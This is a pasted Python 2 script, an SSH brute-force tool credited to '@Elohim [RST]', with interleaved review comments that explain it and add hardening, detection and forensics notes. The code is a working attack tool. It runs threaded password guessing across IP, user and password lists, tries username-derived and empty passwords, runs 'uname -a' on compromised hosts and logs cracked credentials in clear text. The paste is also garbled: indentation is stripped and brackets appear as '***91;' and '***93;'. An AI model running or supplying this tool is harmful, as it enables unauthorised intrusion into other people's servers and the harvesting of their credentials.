1 | import paramiko, sys, Queue, threading | |
2 | ||
# SSHBrute: worker thread that takes (ip, user, passwd) tuples from a shared queue
# and attempts one SSH password login per tuple through paramiko (Python 2 code).
# NOTE(review): the paste site stripped the indentation and added line-number / pipe
# gutters, and `***91;` / `***93;` look like mangled `[` / `]`. The nesting described
# in the comments below is inferred from the statements and cannot be confirmed here.
3 | class SSHBrute(threading.Thread): | |
4 | def __init__(self, queue): | |
5 | threading.Thread.__init__(self) | |
# Shared work queue; brutemain() fills it with (ip, user, password) tuples.
6 | self.queue = queue | |
# Thread body: loops forever, hands each queued tuple to kraken(), then marks it done
# so that queue.join() in brutemain() can return.
7 | def run(self): | |
8 | while True: | |
9 | ip,user,passwd = self.queue.get() | |
10 | self.kraken(ip,user,passwd) | |
11 | self.queue.task_done() | |
12 | ||
# kraken(ip, user, passwd): one login attempt against one host.
# Appears to return True only when the login is accepted and the remote command
# produces output; every other path visible here returns False.
13 | def kraken(self,ip,user,passwd): | |
14 | try: | |
# Hosts already recorded in the global `cracked` list are skipped.
15 | if ip in cracked: return False | |
16 | ||
# Password templates from the wordlist: `%user%` is replaced by the username,
# `%User%` by a title-cased username-based string, and `%null%` by an empty password.
# Defender note: the list therefore targets username-derived and empty passwords;
# sshd settings such as `PermitEmptyPasswords no`, `PasswordAuthentication no`
# (key-only logins) and a low `MaxAuthTries` directly reduce exposure to this.
17 | if '%user%' in str(passwd): | |
18 | passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93; | |
19 | if '%User%' in str(passwd): | |
20 | pwd = user + passwd.split("%")***91;2***93; | |
21 | passwd = passwd.split("%")***91;0***93;+pwd.title() | |
22 | if str(passwd) == '%null%': | |
23 | passwd = '' | |
24 | ||
25 | ssh = paramiko.SSHClient() | |
# AutoAddPolicy accepts any unknown host key without verification.
26 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
# Password authentication with a 35 second timeout; connect() raises on failure,
# so reaching the next statement means the server accepted the credentials.
27 | ssh.connect(ip, username=user, password=passwd, timeout=35) | |
# Accepted credentials are appended in clear text to raw.txt (opened in brutemain()).
28 | raw.write(ip+' '+user+' '+passwd+'\n') | |
29 | raw.flush() | |
# A session channel runs `uname -a` and reads up to 1024 bytes of output.
# Detection note: an accepted password login followed at once by a single
# non-interactive `uname -a` exec request is a pattern to look for in sshd / audit
# logs where command logging is enabled.
30 | chan = ssh.get_transport().open_session() | |
31 | chan.settimeout(35) | |
32 | chan.exec_command('uname -a') | |
33 | data = chan.recv(1024) | |
34 | ||
# No command output: the credentials are logged to nologins.txt and the attempt
# is reported as a failure.
35 | if len(data) == 0: | |
36 | nologs.write(ip+' '+user+' '+passwd+'\n') | |
37 | nologs.flush() | |
38 | return False | |
39 | ||
# Credentials plus the `uname -a` output go to valid.txt, and the host is added to
# `cracked` so that later tuples for the same IP are skipped.
40 | val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') | |
41 | val.flush() | |
42 | cracked.append(ip) | |
43 | chan.close() | |
44 | ssh.close() | |
45 | return True | |
# Every exception ends up here. The exception text is matched against the substring
# 'uthent' (presumably to recognise authentication failures regardless of
# capitalisation - confirm); when the filter switch is 'bad' the IP is written to
# bad.txt. All paths close the client and return False.
46 | except Exception, e: | |
47 | if 'uthent' in str(e): | |
48 | if dbg == 'bad': | |
49 | bad.write(ip+'\n') | |
50 | bad.flush() | |
51 | #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+' ' | |
52 | ssh.close() | |
53 | return False | |
54 | #print ip, str(e) | |
55 | ssh.close() | |
56 | return False | |
57 | ||
# brutemain(): command-line driver. Reads its arguments from sys.argv, starts the
# worker threads, opens the output files, loads the IP / user / password lists and
# queues every (ip, user, password) combination, then waits for the queue to drain.
# NOTE(review): the paste site stripped the indentation and `***91;` / `***93;` look
# like mangled `[` / `]`; the nesting described below is inferred.
58 | def brutemain(): | |
# With no arguments, print the usage banner and return False.
59 | if len(sys.argv) < 2: | |
60 | print """ | |
61 | SSH Brute Force Tool | |
62 | Author: @Elohim ***91;RST***93; | |
63 | Usage: | |
64 | bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* | |
65 | *The filter Switch Takes Either the word "bad" or "no". | |
66 | If you supply the word bad, it filters in bad.txt only the ips | |
67 | which indeed support ssh AUTH and password didn't work""" | |
68 | return False | |
# Worker count is taken from argv[1]; the queue holds at most 20000 pending tuples,
# so put() blocks once the workers fall behind.
69 | ThreadNR = int(sys.argv***91;1***93;) | |
70 | queue = Queue.Queue(maxsize=20000) | |
# Start the daemon worker threads; a failure to start one is reported and ignored.
71 | try: | |
72 | i = 0 | |
73 | for i in range(ThreadNR): | |
74 | t = SSHBrute(queue) | |
75 | t.daemon = True | |
76 | t.start() | |
77 | i += 1 | |
78 | except Exception, e: | |
79 | print 'Cant start more than',i,'Threads!' | |
80 | ||
# Module-level state shared with SSHBrute.kraken(): the output file handles and the
# list of hosts that already yielded a working login.
81 | global bad | |
82 | global val | |
83 | global nologs | |
84 | global cracked | |
85 | global raw | |
86 | cracked = ***91;***93; | |
# Output files in the working directory: bad.txt is truncated on every run ('w');
# valid.txt, nologins.txt and raw.txt are appended to ('a').
# Forensics note: these four file names, holding lines of IP / user / password in
# clear text, are the artefacts this script leaves on the machine it runs from.
87 | bad = open('bad.txt','w') | |
88 | val = open('valid.txt','a') | |
89 | nologs = open('nologins.txt','a') | |
90 | raw = open('raw.txt','a') | |
# The three input lists are read fully into memory, one entry per line.
91 | with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines() | |
92 | with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines() | |
93 | with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines() | |
# Filter switch from argv[5]; the value 'bad' enables the bad.txt logging in kraken().
94 | global dbg | |
95 | dbg = str(sys.argv***91;5***93;) | |
96 | ||
# Queueing order is password -> user -> IP, so each credential pair is tried across
# the whole IP list before the next pair is queued.
# Detection note: a single host therefore sees its attempts spread out over time;
# correlating failed logins from one source address across many hosts is more
# telling than a per-host burst threshold.
# The bare `except` silently discards any error raised while queueing.
97 | try: | |
98 | for password in passwords: | |
99 | for user in users: | |
100 | for ip in ips: | |
101 | queue.put((ip,user,password)) | |
102 | except: | |
103 | pass | |
104 | ||
# Block until every queued tuple has been marked done by a worker.
105 | queue.join() | |
106 | ||
# Script entry point: brutemain() runs only when the file is executed directly,
# not when it is imported.
107 | if __name__ == "__main__": | |
108 | brutemain() |